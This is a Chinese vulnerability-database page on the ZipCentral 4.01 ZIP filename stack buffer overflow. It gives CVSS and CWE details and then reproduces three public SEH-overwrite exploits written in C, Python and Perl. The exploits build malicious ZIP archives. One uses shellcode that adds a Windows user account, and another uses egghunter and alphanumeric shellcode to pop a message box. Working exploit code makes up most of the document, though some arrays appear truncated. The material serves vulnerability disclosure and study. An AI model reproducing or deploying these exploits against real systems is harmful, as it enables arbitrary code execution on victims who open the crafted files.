发布时间 :2006-06-01 06:02:00
修订时间 :2011-07-28 00:00:00

[原文]Stack-based buffer overflow in ZipCentral 4.01 allows remote user-assisted attackers to execute arbitrary code via a ZIP archive containing a long filename.

[CNNVD]ZipCentral ZIP文件解压 栈溢出漏洞(CNNVD-200606-017)


- CVSS (基础分值)

CVSS分值: 7.6 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: HIGH [漏洞利用存在特定的访问条件]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-119 [内存缓冲区边界内操作的限制不恰当]

- CPE (受影响的平台与产品)


- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源
(UNKNOWN)  XF  zipcentral-zip-filename-bo(26737)
(UNKNOWN)  BID  18160
(UNKNOWN)  BUGTRAQ  20060531 Secunia Research: ZipCentral ZIP File Handling Buffer OverflowVulnerability

- 漏洞信息

ZipCentral ZIP文件解压 栈溢出漏洞
高危 缓冲区溢出
2006-06-01 00:00:00 2007-09-27 00:00:00

- 公告与补丁


- 漏洞信息 (2278)

ZipCentral 4.01 ZIP File Handling Local Buffer Overflow Exploit (EDBID:2278)
windows local
2006-08-30 Verified
0 bratax
[点击下载] [点击下载]
ZipCentral 4.01 Exploit by bratax (

Soooooo many thanks to BuzzDee and c0rrupt for helping me with all the
problems I encountered :) Wouldn't have finished this without you guys!

Greetz to everyone I like... (no, that doesn't include you turb00)!


Some technical info:
- vulnerability is available here:
- using SEH to exploit this
- some code might look weird in this source.. (e.g. shellcode, offsets,...)
  this is because a lot of values are changed in memory.. so use your favorite
  debugger to see the real values and codes
- shellcode adds a windows user "bck" with password "bck" (thx metasploit)
- tested on XP Pro English (SP2) and XP Home Dutch (SP2)


#include <stdio.h>
#include <string.h>

unsigned char scode[] =

char head[] = "\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00"
char middle[] = "\x2e\x74\x78\x74\x50\x4B\x01\x02\x14\x00"
char tail[] = "\x2e\x74\x78\x74\x50\x4B\x05\x06\x00\x00"

int main(int argc,char *argv[])
	char overflow[657]; // is 657 bytes big enough for a filename?
	char overflow2[1407];
FILE *vuln;
if(argc == 1)
    printf("ZipCentral 4.01 Buffer Overflow Exploit.\n");
    printf("Coded by bratax (\n");
    printf("Usage: %s <outputfile>\n",argv[0]);
    return 0;
vuln = fopen(argv[1],"w");

//build overflow buffer here.
memset(overflow,0x41,sizeof(overflow)); //fill with crap
memcpy(overflow+2, scode, 483); // our shellcode
memcpy(overflow+653, "\x82\x6E\xEC\x98", 4); // jmp back to shellcode
memset(overflow2, 0x42, sizeof(overflow2)); // more crap
memcpy(overflow2+0,"\x98\x85\x8E\x00", 4); // pop pop ret
// pop pop ret somewhere within 0x00xxxxFF.. needed because of 2 reasons
// which I'm not going to explain here right now..
// notice that 008E8598 will be changed in memory and will become 00C4E0FF
// this might be different on other machines, but will always be 00xxE0FF

    //Write file
    fwrite(head, 1, sizeof(head), vuln);
    fwrite(overflow, 1, sizeof(overflow), vuln);
    fwrite(overflow2, 1, sizeof(overflow2), vuln);
    fwrite(middle, 1, sizeof(middle), vuln);
    fwrite(overflow, 1, sizeof(overflow), vuln);
    fwrite(overflow2, 1, sizeof(overflow2), vuln);
    fwrite(tail, 1, sizeof(tail), vuln);
printf("File written.\nOpen with ZipCentral 4.01 to exploit.\n");
return 0;

// [2006-08-30]

- 漏洞信息 (12053)

ZipCentral (.zip) SEH Exploit (EDBID:12053)
windows local
2010-04-04 Verified
0 TecR0c
[点击下载] [点击下载]
# Title:                ZipCentral (.zip) SEH exploit
# Author:               TecR0c - &
# Download:   
# Platform:             Windows XP sp3 En (VMWARE)
# Greetz to:            Corelan Security Team
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may cause.

# Unfortunately, no one can be told what the Matrix is. You have to see it for yourself!
# To be able to make sure your hex values get mangled correctly i have created my own
# Mangled Chart:
# Discription of exploit:
# You can notice i have used this technique for my PPR and JMPs

print "|------------------------------------------------------------------|"
print "|                         __               __                      |"
print "|   _________  ________  / /___ _____     / /____  ____ _____ ___  |"
print "|  / ___/ __ \/ ___/ _ \/ / __ `/ __ \   / __/ _ \/ __ `/ __ `__ \ |"
print "| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |"
print "| \___/\____/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |"
print "|                                                                  |"
print "|                              |"
print "|                                     |"
print "|                                                                  |"
print "|-------------------------------------------------[ EIP Hunters ]--|"
print "[+] pill (.zip) SEH exploit - by TecR0c"

ldf_header = ("\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"

cdf_header = ("\x50\x4B\x01\x02\x14\x00\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"

eofcdf_header = ("\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00"

#Limit of 50 bytes for the filename

#filename = ("\x50\x41\x53"

filename = (

# ESI - Im going to enjoy watching you die Mr Anderson

# align ESI for msg - To deny our own impulses is to deny the very thing that makes us human
getpc = ("\x89\x05\x5e\x41\x98\x99\x41\x8a\x94\x98\x98\x98")

# EDI is chosen thanks to the egghunter - Never send a human to do a machines job
msg = ( # TITLE=Corelan TEXT="You have been pwned"

buff = filename
buff += "\x20" * (50-len(buff))
buff += "\x57\x30\x30\x54" # If you close your eyes, it almost feels like you're eating runny eggs
buff += "\x57\x30\x30\x54" # The trace was completed
buff += msg # Don't hate me Trinity... I'm just the messenger
buff += "\x41" * (653-len(buff))
buff += "\x89\x06\x42\x42"
buff += "\x56\x29\xa5\x72" # Welcome to the desert of the real
buff += "\x41" * 10
buff += getpc
buff += egghunter # The digital pimp hard at work
buff += "\x42" * (4064-len(buff))
buff += ".txt"

mefile = open('','w');
mefile.write(ldf_header + buff + cdf_header + buff + eofcdf_header);

- 漏洞信息 (14433)

ZipCentral (.zip) Buffer Overflow (SEH) (EDBID:14433)
windows local
2010-07-21 Verified
0 Jiten Pathy
[点击下载] [点击下载]
# Author : Jiten Pathy
# July 21 2010

#Thanks to the page for heelping me understand zip file format
#Thanks to corelanc0d3r for shredding light on these type of exploits at
# Greetz to SSTeam and G4H members

#There is already a exploit on zipcentral filename handling buffer #overflow over 2 months ago which uses an address from a system dll for #SEH which isnt reliable across different platforms so this one uses an #address from exe file which is a little complicated but reliable

my $filename="";

my $ldf_header = "\x50\x4B\x03\x04\x14\x00\x00".
"\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\x00" .
"\xe4\x0f" .# file size

my $cdf_header = "\x50\x4B\x01\x02\x14\x00\x14".
"\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
"\xe4\x0f". # file size

my $eofcdf_header = "\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00".
"\x12\x10\x00\x00". # Size of central directory (bytes)
"\x02\x10\x00\x00". # Offset of start of central directory,
                    # relative to start of archive

my $egghunter="hffffk4diFkDrj02Drk0D2AuEE2C4s4I8K1L0v7K0R0I0i4A7N0J022q0D5M".
#ascii mixed case egghunter with EDX as basereg

my $junk="A"x(653-length($egghunter)-102);

#Here is a different approach prior to make EDX to point at our #egghunter.
#push ebp,pop edx puts ebp into edx and then we add edx with right value.
#Here We encode 
#add edx,087f
#jmp edx ;with custom decoder (muts) which should evntually execute these #two instructions which should be produced in stack after the decoder.SO #we need to prepare esp for this .But i found that instruction "pop esp"('\') breaks the shellcode (not so lucky for this application).
#So we cant just pop things from top of stack to point esp and we cant use #too many "popa" or "pop r" here due to limited space. 
#So what we do here is inc esp using loop which will make esp point #somewhere after the decoder .So i did some lulz math found out how much #increment i need(0xb16) and did 2 loops(in hex 42*2b=b16;both are #alphanumeric) and we get the desired value in esp.There is always way to #make our way theough. 

my $preparegg="\x6a\x42". #push 42h
"\x58".                    #pop eax
"\x6a\x2b".                #push 2bh
"\x59".                   #pop ecx
"C"x5 .                   #fillers for our loop Here is where inner loop #will jump
"\x44".                   #inc esp
"\x48".                   #dec eax
"\x75\xf6".               #converted \x75\xf7 not much difference lol #which is jnz -9
"\x34\x42".               #xor al,42
"\x49".                   #dec ecx
"\x75\xf6".               #again jnz -9 but this one will jump somewher in 
#the fillers but all we care is about inc esp getting executed
"\x55".                   #push ebp
"\x5a".                   #pop edx
"\x25\x35\x32\x31\x35".   #zero eax
"\x2d\x54\x56\x54\x36".   #\x08\xff\xe2\x41
"\x25\x35\x32\x31\x35".   #zero eax
"\x2d\x34\x28\x6b\x29".   #\x66\x81\xc2\x7f

my $fill="A"x(102-length($preparegg));#more nops

my $nseh="\x74\xf7\x41\x41";#becomes 74 98 41 41 jumping 102 bytes back

my $seh="\x41\x6c\x42\x00";#ascii compatible ppr address

#alpha mixedcase messagebox shellcode with EDI as basereg(since egghunter #has already EDI as address of our shellcode )
my $shell="hffffk4diFkDwj02Dwk0D7AuEE4n0b7n1132165L5m403i7l003d8K4G1p5k0l3c".

my $payload=$egghunter.$junk.$preparegg.$fill.$nseh.$seh."w00tw00t".$shell;

my $more="D" x (4064-length($payload));

$payload = $payload.$more.".txt";

print "Size : " . length($payload)."\n";
print "Removing old $filename file\n";
system("del $filename");
print "Creating new $filename file\n";
open(FILE, ">$filename");
print FILE $ldf_header.$payload.$cdf_header.$payload.$eofcdf_header;
print "\m/ Your exploit is ready.\n";
#That popped a messagebox with message "My First Null free Shellcode In Windows"(indeed it was).All you need is a bit of quick math and keep looking for possibilities.
#Hope someone learned something from this re-exploit.		

- 漏洞信息

ZipCentral ZIP File Archive Filename Processing Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public Third-party Verified

- 漏洞描述

A remote overflow exists in ZipCentral. The product fails to perform boundary checks on filenames in zip archives resulting in a stack-based overflow. With a specially crafted request, an attacker can cause arbitrary code execution resulting in a loss of integrity.

- 时间线

2006-05-30 Unknow
Unknow Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者